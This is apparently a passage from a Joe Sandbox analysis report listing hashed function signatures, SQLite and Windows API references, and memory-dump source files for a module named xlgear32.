• Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
• Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
• Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
• Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
APIs
• sqlite3_step.SQLITE3 ref: 609614AB
• sqlite3_reset.SQLITE3 ref: 609614BF
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
• sqlite3_column_int64.SQLITE3 ref: 609614D4
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
• String ID:
• API String ID: 3429445273-0
• Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
• Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
• Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
• Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
APIs
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
• String ID:
• API String ID: 1035992805-0
• Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
• Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
• Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
• Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
APIs
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
                                                                          • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                          • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                          • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                          APIs
                                                                          • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                          • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 2673540737-0
                                                                          • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                          • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                          • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                          • String ID:
                                                                          • API String ID: 3526213481-0
                                                                          • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                          • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                          • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                          APIs
                                                                          • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                          • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                            • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                          • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                            • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                          • sqlite3_step.SQLITE3 ref: 60969197
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 2877408194-0
                                                                          • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                          • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                          • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID:
                                                                          • API String ID: 1163609955-0
                                                                          • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                          • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                          • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                          APIs
                                                                          • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                          • sqlite3_step.SQLITE3 ref: 609615C9
                                                                          • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                            • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                          • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                          • String ID:
                                                                          • API String ID: 4265739436-0
                                                                          • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                          • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                          • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                          APIs
                                                                          • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                                          • strcmp.MSVCRT ref: 6092A66A
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                                          • String ID:
                                                                          • API String ID: 1894734062-0
                                                                          • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                          • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                                          • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1477753154-0
                                                                          • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                          • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                          • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: into$out of
                                                                          • API String ID: 632333372-1114767565
                                                                          • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                          • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                          • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                          APIs
                                                                            • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                          • sqlite3_free.SQLITE3 ref: 609193A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_value_text
                                                                          • String ID: (NULL)$NULL
                                                                          • API String ID: 2175239460-873412390
                                                                          • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                          • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                          • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: string or blob too big$|
                                                                          • API String ID: 632333372-330586046
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: d$|
                                                                          • API String ID: 632333372-415524447
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: -- $d
                                                                          • API String ID: 632333372-777087308
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_value_text
                                                                          • String ID: string or blob too big
                                                                          • API String ID: 2320820228-2803948771
                                                                          APIs
                                                                          • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                          • String ID:
                                                                          • API String ID: 3265351223-3916222277
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_stricmp
                                                                          • String ID: log
                                                                          • API String ID: 912767213-2403297477
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_strnicmp
                                                                          • String ID: SQLITE_
                                                                          • API String ID: 1961171630-787686576
                                                                          APIs
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                          • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                          Strings
                                                                          • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                          Similarity
                                                                          • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID: Invalid argument to rtreedepth()
                                                                          • API String ID: 1063208240-2843521569
                                                                          APIs
                                                                          • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                            • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                            • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                            • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                            • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                          • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID: soft_heap_limit
                                                                          • API String ID: 1251656441-405162809
                                                                          APIs
                                                                          • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                          • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: NULL
                                                                          • API String ID: 632333372-324932091
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeavefree
                                                                          • String ID:
                                                                          • API String ID: 4020351045-0
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                          • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                          • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                          • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2